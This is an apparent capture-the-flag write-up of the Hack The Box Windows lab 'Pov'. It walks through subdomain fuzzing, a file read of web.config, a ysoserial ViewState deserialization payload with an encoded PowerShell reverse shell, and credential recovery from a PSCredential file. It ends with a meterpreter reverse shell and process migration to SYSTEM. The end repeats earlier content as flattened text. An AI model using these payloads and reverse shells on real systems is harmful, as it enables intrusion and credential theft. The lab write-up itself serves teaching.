HTB - Pov

IP Address: 10.10.11.251

Machine Info

Pov is a medium Windows machine that starts with a webpage featuring a business site. Enumerating the initial webpage, an attacker is able to find the subdomain dev.pov.htb. Navigating to the newly discovered subdomain, a download option is vulnerable to remote file read, giving an attacker the means to get valuable information from the web.config file. The subdomain uses the ViewState mechanism, which, in combination with the secrets leaked from the web.config file, is vulnerable to insecure deserialization, leading to remote code execution as the user sfitz. Looking at the remote filesystem, an attacker can discover and manipulate a file that reveals the credentials for the user alaading. Once the attacker has code execution as the user alaading the SeDebugPrivilege is abused to gain code execution in the context of a privileged application, ultimately resulting in code execution as nt authority\system.

Enumeration

Nmap Scan

┌──(kali㉿kali)-[~/…/machines/Windows/Medium/Pov]
└─$ nmap -F $ip -Pn         

PORT   STATE SERVICE
80/tcp open  http

┌──(kali㉿kali)-[~/…/machines/Windows/Medium/Pov]
└─$ nmap -p- --min-rate 2500  $ip -Pn

PORT   STATE SERVICE
80/tcp open  http

┌──(kali㉿kali)-[~/…/machines/Windows/Medium/Pov]
└─$ nmap -sC -sV -p80 $ip

PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: pov.htb
|_http-server-header: Microsoft-IIS/10.0

Fuzz for subdomains

┌──(kali㉿kali)-[~/…/machines/Windows/Medium/Pov]
└─$ ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt:FUZZ -u http://pov.htb/ -H 'Host: FUZZ.pov.htb'  

dev        [Status: 302, Size: 152, Words: 9, Lines: 2, Duration: 131ms]

Add to /etc/hosts

┌──(kali㉿kali)-[~/…/machines/Windows/Medium/Pov]
└─$ sudo sh -c "echo '10.10.11.251 pov.htb dev.pov.htb' >> /etc/hosts"

LFI

web.config

From the secrets from web.config file, I can create .NET serialized object and attempt to get RCE

Shell as pov\sfitz

Creating serialized object with ysoerial

.\ysoserial.exe -p ViewState -g WindowsIdentity --path="/portfolio" --decryptionalg="AES" --decryptionkey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43" -validationkey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468" --validationalg="SHA1" -c "powershell -c powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA2AC4AMgAxACIALAA5ADAAMAAxACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA=="

rQkpxoUR3biNzp3mTLbIkpX1ROXuVDredVARBpljCQ7S2YdpUGClf67G8NN%2FRnU8uksJYAl3lw5oPGmxJ6MCPRjOs58yA3RgtaCZ5q16sVjLv9qbHP%2FDm1ONIo5ElkOt5GpqVPmnmqIvBZtMEk8mMlVCkucZgpdnkDTO428lWjsVJxfvEZgOX0Tj2BK8uvPpCPvlyjAS02gCiXpBQgkFfUF3UXgpxK2L9OVQ%2BK88H5zHd1fHXc4HC8ritovqr%2B%2F%2F1cpGGc4ThrdP%2BpEA95zs2%2BBvy0lBdnR6h3N7w6Gb7p%2FDcX%2BZtzC7C0hMJbX41iNu%2FCmqAYROEu%2Bs1hVH%2BVmmk1SbRgqTHV8JmrDWRbP7OCfqiYJynyEIOAGAMXcfkbf5luNmXzvIchTv6TXaL84uQ6rEcbRCHtmanA5OMpnpG%2Bhf77NyMOIKRIhLRLV8Aucp4irZ0FjXi9AZv9jmbmJZ9prZ%2F7x0aSROdwlUVLuJWl4O7J5INEer0m%2FJuCQNx9X1mxer%2FblF8GeKJkNIBiPQhCvHj159AxmRGEyogoQBlSEP5glWyzZf2IyH9CIPyz4aQGHU2JYFtm5VXyH%2F4J15b8vb0m2dEbk0Htmp9BfPAOjAFuPsgfyzIa1PyYeCn5DdV1ZAHPgogqDEtEjg1qKrUkXMx8Ve0XfUBvuvExNuiaWuidnNpl31D44PdkvTdsoUG0nBO6NxP%2BgQF90GjKYKX57JTB%2Bleth446Nee2TDpTHLSf6hRnzqnbLAmaevDu37NjlvCJstCGqesPtSs8yqmGXFSOu%2BJNOnLTYcrr41eGGpqDhMULGF%2FHnBRHGaCY3PJzjhyn9PBb1oaMCuccWiJnmkpaB8TwXrow5VrT0l02LMk1JtBcNJO5NC5sMrA8vthZXmL4cwHFZ6Z20rrAS3JNt3cAEW1qLjyTRJvKh7aHEiIZ25R2P8yvKGxSDHpCIKKhjXGwbkr0qULbH8NqB6Au30RWaqZF6WNrqqBwiD%2By49zy6y0K%2Bs1WLi821Nwp6TVPvs%2Bok9a0rMN4QgaExyA1qAv6JwxEkdBJltVMH8ymbM26sLMCi7Ui2ya6Eq5x5BVVl97AsLiFqUTGdJOgdEMhO%2FNyHO4iuemFuUHTpMMdeIOOt%2F7%2Fjh2yje%2Bqe7x2dhpER63%2FTsiiSyCnTZSdt4T0Iy8o0t%2BkE9d%2B%2BLvrhlTQNRe8wanrnScyDOmXG2rUu5bfLbXS8BTPjF5DwryUUGikcOxoovIckg32OyPwkMRLomJ0yZoIWzkQBIgJ61JZfhJ%2BH0FcARRF%2BbA3G83D0s3Mtmg2QHojtXtSQ8EtBWfJqjyfm0oA5%2FaeNfsKp5EuKXxqiIKmmaOPN1onN2pVxOH5fAtGfa2tZFx0b3FStcsNOeHJ6z2HNOSNXq6Kdn3WgC7COcowAlTNJBwrbp3xp71wl5cKwGcvmacnpqBIoACD9IMSRGViRBhqA138Kv2jO0t7x7a9FC9z0on3NPkI%2Fg3RRiKyWHjXcMQWLetSMQouqSZOm7pXt7%2F90vVc3KfUGXJkYNcgpJD9MCv2VpERQ9Cwu7HHKkdlxefX5gVwadNUj3g1nPa9Xsw2cgezQYySNof5kBCOSCvgPT2kKuAPb%2BZhNxwQRkwqXN4ChhI9WitDdpWKAfPBST%2B8hRrG2D0IVOYhRuVnHBMIjAfh4XI05D8w3f9SghrgrRckvY%2F02jjrZ2UqBBnDiqf8WLLwqXZWAM3oTT7z5Mn3gie8EyLFv6iFd9wGutmE2nCMMw8Pe8eZqgJWyy6vy0KGCk3hVzoFfcf2MlsB5ZP2SzlNAQKfd%2F6fFi8ohFNXYGi0TBXkuczRA7WXr6etUu43MzcQWNDBMSQ882nuslcNC2Ba5fXVWGbGNtgo2m5liiVYH3uv2KH3379e6OsbH6a%2F448A8f9eSQp2cFYezM8y869EMH9bXpQtUZtZ0PrrERBc80sEQI3Op%2BkF%2BfizdfHG0sszoGYkyUWfTKb3%2F0g66Qv4FN%2BON0Nm91Z27%2FHfGmWwjwlAhrxoGAxuK7GFRSa3ZREnqSsY1JpoNpz%2FImUDgI9VyVISRTiZ8AJEkbyCW3unN7xYsmNFMvrbGbxrykNU0i%2BxQHeAx7QsZ9DsmPH4syCg2QjQ%2FCiQk8vQVKNZNvd2r82hFygg5%2BWnE4QmEv483HMiIJIXb1h9sd25Y%2BkI%2Bk3oiMgOGHiyceZG54%2By5H9AOUEFUp81K1GQiNtyN9%2B646lfN4T%2FoGyPuAQgkaokAxy69Gb7Jqi6OvG5iAoKYsf0kvfibmQ7QQ7ZsTxyo%2FlKACfBLnFyHCRnSJxnu3W%2B21W%2BlJ7TE6A1fpEHkD6NM6ATHvUT7lcPl9mZca6HUNgzJ8lIFDDaLl1fEDBCJeTXytbjZ%2BnAB2lsJDww9iHjIv2Ujtsax80RiIXFet5A4uUFii4M6vEkQ8wCE119R%2FoYfvd5QedvOr5LIvrXJlqn5MDkfMvxzeEidK7i2poJeH7p6eIioyhA814mDZyyImrhqFX11lEOWTZLhvrbp%2BaUzgM9n7hkvnDNcYSbibBWH57zKsMqEstEdFSc%2BPs2ancizWrodNMhG34elppw3DK8trdoR6PQPsxf8Fw1QitDBFjdD2UuRGj7gF7VODq5JLnVsK9F%2BqW6tTe2WMPfhxQVJ1Z1Wc%2BfbEfo93ClmWteISv9KwlRe%2FMH%2FX0vS%2BkhzkzkDg%2BYFrXT1V1WlAQOC9eZpdytkeGvnY67IgtI8mNVMhd3mMcVS7iA362AhEC6%2FTzgvyMW8xdNiY%2BkN30FRpngvPGIcyBK%2FOPdpo881EWtTkqaitxxgNuOW5%2BpWFbfReBsVQSKEknlnf414S3nT7Ng8t1kT2U7PzYNdXUli9F81fEh7MXPfuhQBXuh0hk13zy70AV0a0FLT1l%2BlA2BRYfOlDvDm5HE0zWBJOLgII2AgQGRmUmDup3w%2FdULgdH9e8xEXMVne1X9HRLpmeILfauTYai2tXPwOt2N1wlJvRiNg4adbugqpeGm%2FRBvPx5Glg3AcDSJmBFEcF9fr2ZYn%2BzB8CCOSaHe%2FkqImP9FW4z0T%2FshjgStQarppt25pnsqCkwdHr3cpX53nu6SOqg7U%2BANFhdkuVDR4vY%2BhfaOJi44RANAACBpy14aeibWyHqKz%2BzwrS453%2BT1UJw5eMwHtTKl6ETBhLibBR%2BBX0jZWWpaD7VIxFQKIMbdkvuaVludGedKGTaeoSIKBYK5cN%2B7FlfVUI7%2FwHoEUt1cH3u6GtdOwm5wxWFGXMvPNWMDFzzkZAibylrClRjqxJbAqf3ijXuTKxXCQBu6rJxHioZq3pTh1ruLTNzLIKQ%2FScRGKuLaqNd0mSQI6rSnp0mdSBnD%2FgW10bcRKESfOWvFD1yTUSPCI3ujU6T0tP%2BQaOzhcuoZpMjVlbUAJv%2BS43SF42d2CdyvWib4GcKCPH6yRNwsKJrcfFl3DPvmlZcN9TfIJaZ9q2VeQyU2WaRK3YL83hme53lxFi4G2ySbPAu8tzoPgOCWb0n6pnsQFOLQ%2FoQ4KAYEpZH2Tn4%2BejZlj%2BHZrfBZi9a67Cxvvmq61ipj6HGBSfgfMO7VrxfhUlE2f2nR76jwF8BZ1XlvEKNg9H1HKtbgg%2F7KUvDgWfBFXpWdkuWy5QlCjRKlJ3mu%2F%2FEJStdP%2FEL%2BmbJG7u0A38hJxdrKwmvPJvVlbfxGjq2WNC8qvsdV9mODugxnMm2K%2F8IOJM8zkTTRlJR4m3i79Dgci56Ty5umrn744ok8j79FX8llxpIvxAG96Oixtl%2BPx6%2FjpG9D6toA5p9cdy%2BtFm%2F7UH53uH61JAp0Z3W6BWScN9dMohd5VuG7bzublkTYzAQZw7QEvh3TKncKJhahGJige7WoidZQTLmVqzFnY9cx9x0So3FsS5mTcxf%2FxqbeALEZeofjrWaFhEMidOFbYLjfVA26smK0TS1VJz4BKp7LJNn4ca0vJ5pDQnEqqqDFdd1fNkPW1SIcRMlphq%2B%2Fzw3ZUboL0sBZsFXS%2FDBbfQogDLICmqc%2FTyVeNT8y2coocraBASh1hYKeXTJ%2FYvCHxa6GWljDtsyEg3oZ5P1LWWTxf3i4drwsDuD8C8kngaeJdD%2By5lwyKFnFPZh%2BTVwaRbAaJWNF5cQYdIg68MIJVWnxyDgpxWIXRYQJDaIoe1sstBLGJbCfUhOg%2Ft4WYazlX1LxLgvG4mMU2AL7PoRoXPm91NDJaNH52GiiLhTsNbZqbkhwROu4XGkqW07iw5wsRYnGWv%2F5TPEdQ%3D

I inject the object above in _VIEWSTATE parameter and get a shell as alaading

Shell as alaading

PS C:\users\sfitz\documents> ls

    Directory: C:\users\sfitz\documents

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----       12/25/2023   2:26 PM           1838 connection.xml

It is a PS Credential for alaading:

<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>System.Management.Automation.PSCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>System.Management.Automation.PSCredential</ToString>
    <Props>
      <S N="UserName">alaading</S>
      <SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb01000000cdfb54340c2929419cc739fe1a35bc88000000000200000000001066000000010000200000003b44db1dda743e1442e77627255768e65ae76e179107379a964fa8ff156cee21000000000e8000000002000020000000c0bd8a88cfd817ef9b7382f050190dae03b7c81add6b398b2d32fa5e5ade3eaa30000000a3d1e27f0b3c29dae1348e8adf92cb104ed1d95e39600486af909cf55e2ac0c239d4f671f79d80e425122845d4ae33b240000000b15cd305782edae7a3a75c7e8e3c7d43bc23eaae88fde733a28e1b9437d3766af01fdf6f2cf99d2a23e389326c786317447330113c5cfa25bc86fb0c6e1edda6</SS>
    </Props>
  </Obj>
</Objs>

PowerShell credentials are often used for scripting and automation tasks as a way to store encrypted credentials conveniently.

PS C:\users\sfitz\documents> $credential = Import-Clixml -Path 'C:\users\sfitz\documents\connection.xml'
PS C:\users\sfitz\documents> $credential.GetNetworkCredential().username
PS C:\users\sfitz\documents> $credential.GetNetworkCredential().password

alaading:f8gQ8fynP44ek1m3

PS C:\users\sfitz\documents> .\RunasCs.exe alaading f8gQ8fynP44ek1m3 PowerShell.exe -r 10.10.16.21:443

I'm the Administrator :)

If you have SeDebug privileges, you can debug programs and processes from memory, so we can dump lsass.exe process and get all the secrets and hashes from the machine.
To get RCE as SYSTEM account, you can start meterperter shell and migrate to winlogon process from Metasploit

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.6 LPORT=9001 -f exe -o shell.exe

msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST tun0
msf6 exploit(multi/handler) > set LPORT 9001
msf6 exploit(multi/handler) > run

meterpreter > ps winlogon

PID  PPID  Name          Arch  Session  User                 Path
 ---  ----  ----          ----  -------  ----                 ----
 548  468   winlogon.exe  x64   1        NT AUTHORITY\SYSTEM  C:\Windows\System32\winlogon.exe
 
meterpreter > migrate 548
meterpreter > gituid
Server username: NT AUTHORITY\SYSTEM  

meterpreter > shell

PreviousHTB - Queier NextHTB - Certified

Last updated 10 months ago

┌──(kali㉿kali)-[~/…/machines/Windows/Medium/Pov] └─$ nmap -F $ip -Pn PORT STATE SERVICE 80/tcp open http ┌──(kali㉿kali)-[~/…/machines/Windows/Medium/Pov] └─$ nmap -p- --min-rate 2500 $ip -Pn PORT STATE SERVICE 80/tcp open http ┌──(kali㉿kali)-[~/…/machines/Windows/Medium/Pov] └─$ nmap -sC -sV -p80 $ip PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 10.0 | http-methods: |_ Potentially risky methods: TRACE |_http-title: pov.htb |_http-server-header: Microsoft-IIS/10.0

┌──(kali㉿kali)-[~/…/machines/Windows/Medium/Pov] └─$ ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt:FUZZ -u http://pov.htb/ -H 'Host: FUZZ.pov.htb' dev [Status: 302, Size: 152, Words: 9, Lines: 2, Duration: 131ms]

.\ysoserial.exe -p ViewState -g WindowsIdentity --path="/portfolio" --decryptionalg="AES" --decryptionkey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43" -validationkey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468" --validationalg="SHA1" -c "powershell -c powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA2AC4AMgAxACIALAA5ADAAMAAxACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==" rQkpxoUR3biNzp3mTLbIkpX1ROXuVDredVARBpljCQ7S2YdpUGClf67G8NN%2FRnU8uksJYAl3lw5oPGmxJ6MCPRjOs58yA3RgtaCZ5q16sVjLv9qbHP%2FDm1ONIo5ElkOt5GpqVPmnmqIvBZtMEk8mMlVCkucZgpdnkDTO428lWjsVJxfvEZgOX0Tj2BK8uvPpCPvlyjAS02gCiXpBQgkFfUF3UXgpxK2L9OVQ%2BK88H5zHd1fHXc4HC8ritovqr%2B%2F%2F1cpGGc4ThrdP%2BpEA95zs2%2BBvy0lBdnR6h3N7w6Gb7p%2FDcX%2BZtzC7C0hMJbX41iNu%2FCmqAYROEu%2Bs1hVH%2BVmmk1SbRgqTHV8JmrDWRbP7OCfqiYJynyEIOAGAMXcfkbf5luNmXzvIchTv6TXaL84uQ6rEcbRCHtmanA5OMpnpG%2Bhf77NyMOIKRIhLRLV8Aucp4irZ0FjXi9AZv9jmbmJZ9prZ%2F7x0aSROdwlUVLuJWl4O7J5INEer0m%2FJuCQNx9X1mxer%2FblF8GeKJkNIBiPQhCvHj159AxmRGEyogoQBlSEP5glWyzZf2IyH9CIPyz4aQGHU2JYFtm5VXyH%2F4J15b8vb0m2dEbk0Htmp9BfPAOjAFuPsgfyzIa1PyYeCn5DdV1ZAHPgogqDEtEjg1qKrUkXMx8Ve0XfUBvuvExNuiaWuidnNpl31D44PdkvTdsoUG0nBO6NxP%2BgQF90GjKYKX57JTB%2Bleth446Nee2TDpTHLSf6hRnzqnbLAmaevDu37NjlvCJstCGqesPtSs8yqmGXFSOu%2BJNOnLTYcrr41eGGpqDhMULGF%2FHnBRHGaCY3PJzjhyn9PBb1oaMCuccWiJnmkpaB8TwXrow5VrT0l02LMk1JtBcNJO5NC5sMrA8vthZXmL4cwHFZ6Z20rrAS3JNt3cAEW1qLjyTRJvKh7aHEiIZ25R2P8yvKGxSDHpCIKKhjXGwbkr0qULbH8NqB6Au30RWaqZF6WNrqqBwiD%2By49zy6y0K%2Bs1WLi821Nwp6TVPvs%2Bok9a0rMN4QgaExyA1qAv6JwxEkdBJltVMH8ymbM26sLMCi7Ui2ya6Eq5x5BVVl97AsLiFqUTGdJOgdEMhO%2FNyHO4iuemFuUHTpMMdeIOOt%2F7%2Fjh2yje%2Bqe7x2dhpER63%2FTsiiSyCnTZSdt4T0Iy8o0t%2BkE9d%2B%2BLvrhlTQNRe8wanrnScyDOmXG2rUu5bfLbXS8BTPjF5DwryUUGikcOxoovIckg32OyPwkMRLomJ0yZoIWzkQBIgJ61JZfhJ%2BH0FcARRF%2BbA3G83D0s3Mtmg2QHojtXtSQ8EtBWfJqjyfm0oA5%2FaeNfsKp5EuKXxqiIKmmaOPN1onN2pVxOH5fAtGfa2tZFx0b3FStcsNOeHJ6z2HNOSNXq6Kdn3WgC7COcowAlTNJBwrbp3xp71wl5cKwGcvmacnpqBIoACD9IMSRGViRBhqA138Kv2jO0t7x7a9FC9z0on3NPkI%2Fg3RRiKyWHjXcMQWLetSMQouqSZOm7pXt7%2F90vVc3KfUGXJkYNcgpJD9MCv2VpERQ9Cwu7HHKkdlxefX5gVwadNUj3g1nPa9Xsw2cgezQYySNof5kBCOSCvgPT2kKuAPb%2BZhNxwQRkwqXN4ChhI9WitDdpWKAfPBST%2B8hRrG2D0IVOYhRuVnHBMIjAfh4XI05D8w3f9SghrgrRckvY%2F02jjrZ2UqBBnDiqf8WLLwqXZWAM3oTT7z5Mn3gie8EyLFv6iFd9wGutmE2nCMMw8Pe8eZqgJWyy6vy0KGCk3hVzoFfcf2MlsB5ZP2SzlNAQKfd%2F6fFi8ohFNXYGi0TBXkuczRA7WXr6etUu43MzcQWNDBMSQ882nuslcNC2Ba5fXVWGbGNtgo2m5liiVYH3uv2KH3379e6OsbH6a%2F448A8f9eSQp2cFYezM8y869EMH9bXpQtUZtZ0PrrERBc80sEQI3Op%2BkF%2BfizdfHG0sszoGYkyUWfTKb3%2F0g66Qv4FN%2BON0Nm91Z27%2FHfGmWwjwlAhrxoGAxuK7GFRSa3ZREnqSsY1JpoNpz%2FImUDgI9VyVISRTiZ8AJEkbyCW3unN7xYsmNFMvrbGbxrykNU0i%2BxQHeAx7QsZ9DsmPH4syCg2QjQ%2FCiQk8vQVKNZNvd2r82hFygg5%2BWnE4QmEv483HMiIJIXb1h9sd25Y%2BkI%2Bk3oiMgOGHiyceZG54%2By5H9AOUEFUp81K1GQiNtyN9%2B646lfN4T%2FoGyPuAQgkaokAxy69Gb7Jqi6OvG5iAoKYsf0kvfibmQ7QQ7ZsTxyo%2FlKACfBLnFyHCRnSJxnu3W%2B21W%2BlJ7TE6A1fpEHkD6NM6ATHvUT7lcPl9mZca6HUNgzJ8lIFDDaLl1fEDBCJeTXytbjZ%2BnAB2lsJDww9iHjIv2Ujtsax80RiIXFet5A4uUFii4M6vEkQ8wCE119R%2FoYfvd5QedvOr5LIvrXJlqn5MDkfMvxzeEidK7i2poJeH7p6eIioyhA814mDZyyImrhqFX11lEOWTZLhvrbp%2BaUzgM9n7hkvnDNcYSbibBWH57zKsMqEstEdFSc%2BPs2ancizWrodNMhG34elppw3DK8trdoR6PQPsxf8Fw1QitDBFjdD2UuRGj7gF7VODq5JLnVsK9F%2BqW6tTe2WMPfhxQVJ1Z1Wc%2BfbEfo93ClmWteISv9KwlRe%2FMH%2FX0vS%2BkhzkzkDg%2BYFrXT1V1WlAQOC9eZpdytkeGvnY67IgtI8mNVMhd3mMcVS7iA362AhEC6%2FTzgvyMW8xdNiY%2BkN30FRpngvPGIcyBK%2FOPdpo881EWtTkqaitxxgNuOW5%2BpWFbfReBsVQSKEknlnf414S3nT7Ng8t1kT2U7PzYNdXUli9F81fEh7MXPfuhQBXuh0hk13zy70AV0a0FLT1l%2BlA2BRYfOlDvDm5HE0zWBJOLgII2AgQGRmUmDup3w%2FdULgdH9e8xEXMVne1X9HRLpmeILfauTYai2tXPwOt2N1wlJvRiNg4adbugqpeGm%2FRBvPx5Glg3AcDSJmBFEcF9fr2ZYn%2BzB8CCOSaHe%2FkqImP9FW4z0T%2FshjgStQarppt25pnsqCkwdHr3cpX53nu6SOqg7U%2BANFhdkuVDR4vY%2BhfaOJi44RANAACBpy14aeibWyHqKz%2BzwrS453%2BT1UJw5eMwHtTKl6ETBhLibBR%2BBX0jZWWpaD7VIxFQKIMbdkvuaVludGedKGTaeoSIKBYK5cN%2B7FlfVUI7%2FwHoEUt1cH3u6GtdOwm5wxWFGXMvPNWMDFzzkZAibylrClRjqxJbAqf3ijXuTKxXCQBu6rJxHioZq3pTh1ruLTNzLIKQ%2FScRGKuLaqNd0mSQI6rSnp0mdSBnD%2FgW10bcRKESfOWvFD1yTUSPCI3ujU6T0tP%2BQaOzhcuoZpMjVlbUAJv%2BS43SF42d2CdyvWib4GcKCPH6yRNwsKJrcfFl3DPvmlZcN9TfIJaZ9q2VeQyU2WaRK3YL83hme53lxFi4G2ySbPAu8tzoPgOCWb0n6pnsQFOLQ%2FoQ4KAYEpZH2Tn4%2BejZlj%2BHZrfBZi9a67Cxvvmq61ipj6HGBSfgfMO7VrxfhUlE2f2nR76jwF8BZ1XlvEKNg9H1HKtbgg%2F7KUvDgWfBFXpWdkuWy5QlCjRKlJ3mu%2F%2FEJStdP%2FEL%2BmbJG7u0A38hJxdrKwmvPJvVlbfxGjq2WNC8qvsdV9mODugxnMm2K%2F8IOJM8zkTTRlJR4m3i79Dgci56Ty5umrn744ok8j79FX8llxpIvxAG96Oixtl%2BPx6%2FjpG9D6toA5p9cdy%2BtFm%2F7UH53uH61JAp0Z3W6BWScN9dMohd5VuG7bzublkTYzAQZw7QEvh3TKncKJhahGJige7WoidZQTLmVqzFnY9cx9x0So3FsS5mTcxf%2FxqbeALEZeofjrWaFhEMidOFbYLjfVA26smK0TS1VJz4BKp7LJNn4ca0vJ5pDQnEqqqDFdd1fNkPW1SIcRMlphq%2B%2Fzw3ZUboL0sBZsFXS%2FDBbfQogDLICmqc%2FTyVeNT8y2coocraBASh1hYKeXTJ%2FYvCHxa6GWljDtsyEg3oZ5P1LWWTxf3i4drwsDuD8C8kngaeJdD%2By5lwyKFnFPZh%2BTVwaRbAaJWNF5cQYdIg68MIJVWnxyDgpxWIXRYQJDaIoe1sstBLGJbCfUhOg%2Ft4WYazlX1LxLgvG4mMU2AL7PoRoXPm91NDJaNH52GiiLhTsNbZqbkhwROu4XGkqW07iw5wsRYnGWv%2F5TPEdQ%3D

PS C:\users\sfitz\documents> ls Directory: C:\users\sfitz\documents Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 12/25/2023 2:26 PM 1838 connection.xml

<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04"> <Obj RefId="0"> <TN RefId="0"> <T>System.Management.Automation.PSCredential</T> <T>System.Object</T> </TN> <ToString>System.Management.Automation.PSCredential</ToString> <Props> <S N="UserName">alaading</S> <SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb01000000cdfb54340c2929419cc739fe1a35bc88000000000200000000001066000000010000200000003b44db1dda743e1442e77627255768e65ae76e179107379a964fa8ff156cee21000000000e8000000002000020000000c0bd8a88cfd817ef9b7382f050190dae03b7c81add6b398b2d32fa5e5ade3eaa30000000a3d1e27f0b3c29dae1348e8adf92cb104ed1d95e39600486af909cf55e2ac0c239d4f671f79d80e425122845d4ae33b240000000b15cd305782edae7a3a75c7e8e3c7d43bc23eaae88fde733a28e1b9437d3766af01fdf6f2cf99d2a23e389326c786317447330113c5cfa25bc86fb0c6e1edda6</SS> </Props> </Obj> </Objs>

PS C:\users\sfitz\documents> $credential = Import-Clixml -Path 'C:\users\sfitz\documents\connection.xml' PS C:\users\sfitz\documents> $credential.GetNetworkCredential().username PS C:\users\sfitz\documents> $credential.GetNetworkCredential().password

